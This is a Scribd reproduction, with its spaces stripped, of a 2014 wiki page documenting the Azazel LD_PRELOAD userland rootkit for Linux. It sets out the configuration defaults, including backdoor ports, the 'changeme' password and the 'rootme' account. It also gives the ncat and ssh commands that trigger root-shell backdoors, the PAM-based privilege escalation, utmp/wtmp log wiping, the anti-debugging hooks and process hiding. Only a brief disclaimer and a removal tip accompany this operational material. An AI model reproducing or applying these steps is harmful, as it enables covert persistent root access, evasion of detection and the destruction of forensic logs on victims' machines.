Scribd
Upload
46 views6 pages

Azazel Rootkit Overview and Features

Azazel is a Linux userland rootkit written in C that uses LD_PRELOAD technique to hook system calls and hide its presence. It features log cleaning, process hiding, anti-debugging techniques, and includes both plaintext and encrypted backdoors to provide remote interactive shells. The rootkit focuses on evading detection tools like lsof, ps and unhide through techniques like selectively not hooking those programs and obfuscating strings.

Uploaded by

OmongoleJimJohnson
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
46 views6 pages

Azazel Rootkit Overview and Features

Azazel is a Linux userland rootkit written in C that uses LD_PRELOAD technique to hook system calls and hide its presence. It features log cleaning, process hiding, anti-debugging techniques, and includes both plaintext and encrypted backdoors to provide remote interactive shells. The rootkit focuses on evading detection tools like lsof, ps and unhide through techniques like selectively not hooking those programs and obfuscating strings.

Uploaded by

OmongoleJimJohnson
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Tweet

Azazel
FromSecurity101BlackhatTechniquesHackingTutorialsVulnerabilityResearchSecurityTools
AzazelisauserlandrootkitwritteninCbasedoffoftheoriginalLD_PRELOADtechniquefromJynxrootkit.Itis
morerobustandhasadditionalfeatures,[Link]
includelogcleaning,pcapsubversion,andmore.
Contents
1Disclaimer
2Features
3LatestSource
4HookingMethods
5Configuration
6BackdoorExamples
6.1Plaintextbackdoor
6.2Crypthookbackdoor
6.3PAMbackdoor
7LogClearing
8AntiDebugging
9ProcessHiding
10Preliminaryldd/unhideobfuscation
11Removal
12Related
Disclaimer
Itisacrimetousetechniquesortoolsonthispageagainstanysystemwithoutwritten
authorizationunlessthesysteminquestionbelongstoyou
Features
Antidebugging
Avoidsunhide,lsof,ps,ldddetection
Hidesfilesanddirectories
Hidesremoteconnections
Hidesprocesses
Hideslogins
PCAPhooksavoidlocalsniffing
TwoacceptbackdoorswithfullPTYshells.
Crypthookencryptedaccept()backdoor
Plaintextaccept()backdoor
PAMbackdoorforlocalprivescandremoteentry
Logcleanupforutmp/wtmpentriesbasedonpty
Usesxortoobfuscatestaticstrings
LatestSource
Clonethesources
Terminal
localhost:~$gitclone[Link]
Buildtherootkit
Terminal
localhost:~$make
Running"makeinstall"[Link]
impossible,it'sanunnecessaryandpainfulprocedure,nottomentionyoumayforgetto
removeit.
HookingMethods
AzazelutilizesthesamehookingmethodsasJynx/[Link]
executionbytakingadvantageoftheLD_PRELOADvariable.Bydefault,[Link]
into/[Link]/etc/[Link].
Exampleruntimehookingofbash.
Terminal
localhost:~$LD_PRELOAD=/lib/[Link]
Insteadofdlsym'ingdirectlibcfunctionsbygloballydeclaringold_syscall,Azazelhasanewstructureinazazel.h
namedsyscall_list.[Link]
[Link]
thepreprocessordefinitionsalsoinconst.h.EachdefinitionhasaprefixofSYS_name_of_function_in_caps.For
exampletocalllibc'sversionoffopen,youwouldusesyscalls[SYS_FOPEN].syscall_func()
typedef struct struct_syscalls {
char syscall_name[51];
void *(*syscall_func)();
} s_syscalls;
Configuration
[Link]
cipheredusinganXORkeyinordertonotexposethemtodumpingprogramslike"strings."Seebelowforalistof
variablesandtheirassociatedpurpose.
TherootkitwillhideallTCP/IPconnectionswithintheseHIGHandLOWportranges.
Theserangesareusedtonotonlyhidefromnetstat/lsof,butalsotohidefromsniffingusing
libpcap.
Numeric
Variable(s) Description Default
LOW_PORT/
HIGH_PORT
PortsusedtotriggerfullPTYplaintextbackdoor. 6104061050
CRYPT_LOW/
CRYPT_HIGH
PortsusedtotriggerfullPTYcrypthookbackdoor. 6105161060
PAM_PORT Alsohidesthisportbutdoesn'ttriggeracceptbackdoor. 61061
SHELL_MSG Displaythisstringtousersoncetheygetashell Welcome
SHELL_PASSWD Shellpasswordforbothplaintextandcrypthookbackdoors changeme
SHELL_TYPE Usethisshellforaccept()backdoors. /bin/bash
MAGIC_STRING Hideanyfileswiththisstringinthefilename. __
BLIND_LOGIN FakeuseraccountusedtoactivatethePAMbackdoor. rootme
ANTI_DEBUG_MSG Displaythismessagetothesysadminiftheytrytoptrace
Don'tscratchthe
walls.
CLEANUP_LOGS
Ifthisenvironmentvarissettoavalidpts,thencleanup
utmp/wtmplogsforthatpts.
CLEANUP_LOGS
Thefollowingvariablesarespecificallyincludedforthecrypthookbackdoor.
Numeric
Variable(s) Description Default
PASSPHRASE Thiskeyisusedforencryption/decryptionofsessions HelloNSA
KEY_SALT Keysaltusedforkeyderivation. changeme
BackdoorExamples
Foreachoftheseexamplesweareassumingthatsshdishookedwithazazelandabletotriggeranyofthethree
operationalbackdoors.
Plaintextbackdoor
WeneedtosetthelocalporttosomethingwithintherangesofLOW_PORTandHIGH_PORTasconfigured
[Link],butitalsotriggers
[Link]'spoption.
Uponsuccessfulyconnectingtotheremotedaemon,thefirstlineyouentershouldbetheSHELL_PASSWDthat
youcreated.
$ ncat target 22 -p 61040
changeme
Welcome!
Here's a shell.
root@host:/root #
Crypthookbackdoor
TriggeringtheCrypthookbackdoorissimilartotheplaintextbackdoor,butweneedtospeakthesameprotocol.
CrypthookisanAESencryptionwrapperforTCP/[Link]
Crypthookreliesonpreloadhookingaswell,andcanbeusedwithnetcatbyutilizingLD_PRELOAD
environmentvariable.
$ LD_PRELOAD=./[Link] ncat localhost 22 -p 61051
changeme
Welcome!
Here's a shell.
root@host:/root/ #
PAMbackdoor
[Link]
[Link]
withsshd,theconnectionwillnotbehiddenunlessyoucanforcesshclienttobindtoalocalportwithinoneofthe
[Link]'dliketo
hide.
$ make client
$ LD_PRELOAD=./[Link] ssh rootme@localhost
root@host:/ #
ThePAMhookscanalsobeusedforlocalprivesc.
$ su - rootme
#
LogClearing
Logclearingcanbeaccomplishedbysettingtheenvironmentvariabletothetty/ptsdevicethatyouwanttoremove
[Link]
backdoors,[Link],ifyou
needtousethePAMbackdoorthroughSSH,youwillneedtomanuallyremoveyourptsfromthelogsas
demonstratedbelow.
$ w | grep pts/16
root pts/16 :0.0 Wed16 2:33m 0.16s 0.16s bash
$ CLEANUP_LOGS="pts/16" ls
utmp logs cleaned up.
wtmp logs cleaned up.
$ w | grep pts/16
$
AntiDebugging
Azazelhooksptrace()andreturns1,[Link]
sysadminisreallymoreofajokethananythingandwilldefinitelysetoffalarmsthatsomethingiswrong.
$ strace -p $PPID
Don't scratch the walls
Thisworksonanyuserlanddebugger(ltrace,strace,gdb,ftrace).Thishookcouldbeeasilyextendedtohide
specificinformationshouldyoudesiretodoso.
ProcessHiding
Jynx/[Link]
usingthismethod,soAzazeladdressesthisbyagainusingenvironmentvariablestomaskanyprocessesthatmay
[Link],butdefaultsto
HIDE_THIS_SHELL.
$ env HIDE_THIS_SHELL=plz ncat -l -p 61061
Whenthisenvironmentvariableisset,[Link]
[Link],youhavetousethisenvironmentvariableto
accesshiddenfiles.
Tweet
Preliminaryldd/unhideobfuscation
[Link]
aredone,[Link]
library,[Link]
antidebug/ldd/unhideobfuscation.
Removal
ToremoveAzazel,thebestcourseofactionistobootintoalivecd,mountyourbootableharddrive,anddeletethe
/etc/ld_preload.sofilefromthepartition.
Related
Linux
LD_PRELOAD
C
CryptHook([Link]
Jynx
HookingPAM
Retrievedfrom"[Link]
Thispagewaslastmodifiedon14February2014,at02:34.

You might also like